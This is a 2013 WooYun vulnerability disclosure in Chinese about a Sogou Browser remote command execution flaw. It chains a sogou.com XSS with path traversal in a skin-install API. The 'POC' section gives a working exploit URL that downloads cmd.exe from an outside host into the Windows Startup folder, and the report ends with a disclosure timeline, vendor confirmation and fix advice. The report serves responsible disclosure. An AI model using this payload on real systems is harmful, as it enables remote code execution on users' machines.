漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-037211
漏洞标题:搜狗浏览器远程命令执行漏洞
相关厂商:搜狗
漏洞作者: 只抽红梅
提交时间:2013-09-15 14:54
修复时间:2013-12-14 14:54
公开时间:2013-12-14 14:54
漏洞类型:设计错误/逻辑缺陷
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-09-15: 细节已通知厂商并且等待厂商处理中
2013-09-16: 厂商已经确认,细节仅向厂商公开
2013-09-19: 细节向第三方安全合作伙伴开放
2013-11-10: 细节向核心白帽子及相关领域专家公开
2013-11-20: 细节向普通白帽子公开
2013-11-30: 细节向实习白帽子公开
2013-12-14: 细节向公众公开
简要描述:
对于推动企业安全问题的修复,乌云是一个再合适不过的平台了。看看这次能不能帮助到搜狗。
详细说明:
其实准确一点应该叫《搜狗浏览器下载文件到任意目录导致远程命令执行漏洞》。
强烈推荐黑哥的《去年跨过的浏览器》,地址:http://vdisk.weibo.com/s/z1id0otCRMVPt
国内为数不多的关于浏览器安全方面的资料,浏览器漏洞出自这里。
测试环境:
windows 2003 + 搜狗浏览器(4.1.3.9297)
1、下载漏洞
上面代码调用浏览器 api,下载远程的文件到:C:\Documents and Settings\Administrator\Application Data\SogouExplorer\skin 目录内。
"cmd.exe" 这里可以通过 ../ 来跨目录,当我们跨目录把远程文件下载到:C:\Documents and Settings\Administrator\「开始」菜单\程序\启动 目录内就达到了远程命令执行的效果。
2、XSS
要调用的 api 有权限控制,*.sogou.com 域有权限调用,我们就找个 XSS 来:
http://player.mbox.sogou.com/FlashMP3Player.swf?isFlashReady=function(){if(!window.x){alert(1);window.x=1;}}
3、POC
到这里就只差 POC 了,构造如下:
http://player.mbox.sogou.com/FlashMP3Player.swf?isFlashReady=function(){if(!window.x){window.external.SkinCall("install", "../../../「开始」菜单/程序/启动/cmd.exe", 0, "http://hongmei.me/cmd.exe", "instThmemeCallback");window.x=1;}}
4、效果
PS:
1、下载到皮肤的目录浏览器默认会加上后缀,但是跨出去就没有了,为什么跨出去的时候不也加上呢?
2、启动目录和皮肤目录都在当前用户目录下,所以漏洞不受用户名的限制
漏洞证明:
修复方案:
1、修复本文中的 XSS,以及所有 *.sogou.com 域下的 XSS
2、严格控制 api 的权限
3、限制下载文件的域名以及禁止跨目录
版权声明:转载请注明来源 只抽红梅@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:5
确认时间:2013-09-16 12:35
厂商回复:
收到,感谢提供!
最新状态:
暂无